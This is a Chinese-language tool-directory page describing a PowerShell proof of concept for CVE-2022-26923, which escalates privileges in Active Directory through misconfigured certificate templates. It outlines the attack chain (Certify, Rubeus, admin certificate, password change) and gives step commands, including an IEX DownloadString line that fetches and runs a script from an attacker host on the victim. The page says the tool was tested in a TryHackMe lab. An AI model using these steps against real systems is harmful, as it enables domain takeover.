Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-26923-Powershell-POC — 一个用于从内存加载并自动运行Certify和Rubeus的powershell poc。 | Kitploit
工具/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
权限提升漏洞分析漏洞利用渗透测试学习与教育实验室与实践
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

一个用于从内存加载并自动运行Certify和Rubeus的powershell poc。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
17814年前尚未审核

CVE-2022-26923-Powershell-POC

一个用于从内存中加载并自动运行Certify和Rubeus的Powershell PoC。

工作原理?

  1. 将Certify.exe和Rubeus.exe加载到内存中。
  2. 扫描目标机器是否存在配置错误的证书模板。(更多信息请访问 https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. 基于存在漏洞的模板,为管理员用户请求证书。
  4. 将证书发送给证书处理程序,该程序将其转换为.pfx格式并返回给客户端。
  5. 利用Rubeus加载证书并为管理员用户生成票据。
  6. 更改管理员用户的密码。(仅用于演示)

该PoC已在以下TryHackMe实验室中测试:https://tryhackme.com/room/adcertificatetemplates

此CVE用于权限提升,因此该演示及THM实验室均不涉及初始利用。

步骤:

  1. python3 -m http.server 80 [攻击机]
  2. python3 uploader.py 8000 [攻击机]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [受害机]

注意:此PoC仅供教育目的,您需对自己的行为负责。

下载工具